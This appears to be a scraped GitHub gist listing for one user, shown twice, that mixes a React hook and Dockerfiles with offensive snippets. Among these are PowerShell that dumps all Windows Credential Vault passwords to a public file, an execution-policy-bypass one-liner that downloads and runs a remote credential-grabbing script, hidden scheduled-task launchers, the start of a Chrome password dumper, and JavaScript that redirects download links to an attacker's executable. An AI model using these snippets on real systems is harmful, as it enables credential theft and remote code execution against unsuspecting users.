Kyle Mistele K-Mistele

## useBroadcastChannel.ts
import { useCallback, useEffect, useRef, useState } from "react";

interface UseBroadcastChannelOptions {
  name: string;
  onMessage?: (event: MessageEvent) => void;
  onMessageError?: (event: MessageEvent) => void;
}

interface UseBroadcastChannelReturn<D, P> {
  isSupported: boolean;

## Dockerfile
# use a builder for all your dependencies including Typescript compilation
FROM node:18.17.1 as builder

WORKDIR /opt/app

# Install dependencies
COPY package*.json .
RUN npm install

# receive secrets using the --build-arg command e.g. from github actions secrets

## Dockerfile
FROM node:18

WORKDIR /opt/app

COPY package*.json ./
RUN npm install

# use --build-arg=example_api_key=1234 to set the API_KEY env var. repeat as necessary
# in your github action or other CI/CD, set the arguments from your secrets store.
ARG example_api_key

## Invoke-RunAsUser.ps1
$action=New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-windowstyle hidden -ep bypass C:\path\to\script.ps1';
$trigger=New-ScheduledTaskTrigger -Once -At 'MM/DD/YYYY HH:MM:SS PM';
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Launch' -User 'DOMAIN\username'

## DumpChromePasswords.ps1
$sqlitedll = ".\System.Data.SQLite.dll"

if (!(Test-Path -Path $sqlitedll))
{
    Write-Host "Grab your copy of System.Data.SQLite.dll. " -ForegroundColor Yellow
    Write-Host "Most likely from https://system.data.sqlite.org/downloads/1.0.113.0/sqlite-netFx40-static-binary-bundle-x64-2010-1.0.113.0.zip" -ForegroundColor Yellow
    Write-Host "Your bitness is:" (8*[IntPtr]::Size) -ForegroundColor Yellow
    Write-Host "Your .Net version is:" $PSVersionTable.CLRVersion -ForegroundColor Yellow
    Write-Host 'No installation needed. Just unzip and update the $sqlitedll variable above.' -ForegroundColor Yellow
    return

## executescheduledtask.ps1
powershell -ExecutionPolicy bypass "$action=New-ScheduledTaskAction -Execute 'C:\path\to\script.ps1';$trigger=New-ScheduledTaskTrigger -Once -At 'MM/DD/YYYY HH:MM:SS PM'; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Launch' -User 'DOMAIN\username'"

## credlistv2.ps1

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() |% {$_.RetrievePasswords();$_} | Out-File C:\users\public\output.dmp

## oneliner.ps1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HanseSecure/credgrap_ie_edge/master/credgrap_ie_edge.ps1')"

## credlist.ps1
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password

## download_page_example.js
// grab all download links on the page
const download_links = document.getElementsByClassName('download-link');

// change their target to a malicious piece of software hosted on the attacker's server
for (let link of download_links) {
  link.setAttribute('href', 'https://evil-website.com/evil-program.exe');
}
	import { useCallback, useEffect, useRef, useState } from "react";

	interface UseBroadcastChannelOptions {
	name: string;
	onMessage?: (event: MessageEvent) => void;
	onMessageError?: (event: MessageEvent) => void;
	}

	interface UseBroadcastChannelReturn<D, P> {
	isSupported: boolean;
	# use a builder for all your dependencies including Typescript compilation
	FROM node:18.17.1 as builder

	WORKDIR /opt/app

	# Install dependencies
	COPY package*.json .
	RUN npm install

	# receive secrets using the --build-arg command e.g. from github actions secrets
	FROM node:18

	WORKDIR /opt/app

	COPY package*.json ./
	RUN npm install

	# use --build-arg=example_api_key=1234 to set the API_KEY env var. repeat as necessary
	# in your github action or other CI/CD, set the arguments from your secrets store.
	ARG example_api_key
	$action=New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-windowstyle hidden -ep bypass C:\path\to\script.ps1';
	$trigger=New-ScheduledTaskTrigger -Once -At 'MM/DD/YYYY HH:MM:SS PM';
	Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Launch' -User 'DOMAIN\username'
	$sqlitedll = ".\System.Data.SQLite.dll"

	if (!(Test-Path -Path $sqlitedll))
	{
	Write-Host "Grab your copy of System.Data.SQLite.dll. " -ForegroundColor Yellow
	Write-Host "Most likely from https://system.data.sqlite.org/downloads/1.0.113.0/sqlite-netFx40-static-binary-bundle-x64-2010-1.0.113.0.zip" -ForegroundColor Yellow
	Write-Host "Your bitness is:" (8*[IntPtr]::Size) -ForegroundColor Yellow
	Write-Host "Your .Net version is:" $PSVersionTable.CLRVersion -ForegroundColor Yellow
	Write-Host 'No installation needed. Just unzip and update the $sqlitedll variable above.' -ForegroundColor Yellow
	return

	[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
	$vault = New-Object Windows.Security.Credentials.PasswordVault
	$vault.RetrieveAll() \|% {$_.RetrievePasswords();$_} \| Out-File C:\users\public\output.dmp
	[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
	$vault = New-Object Windows.Security.Credentials.PasswordVault
	$vault.RetrieveAll() \| % { $_.RetrievePassword();$_ } \| select username,resource,password
	// grab all download links on the page
	const download_links = document.getElementsByClassName('download-link');

	// change their target to a malicious piece of software hosted on the attacker's server
	for (let link of download_links) {
	link.setAttribute('href', 'https://evil-website.com/evil-program.exe');
	}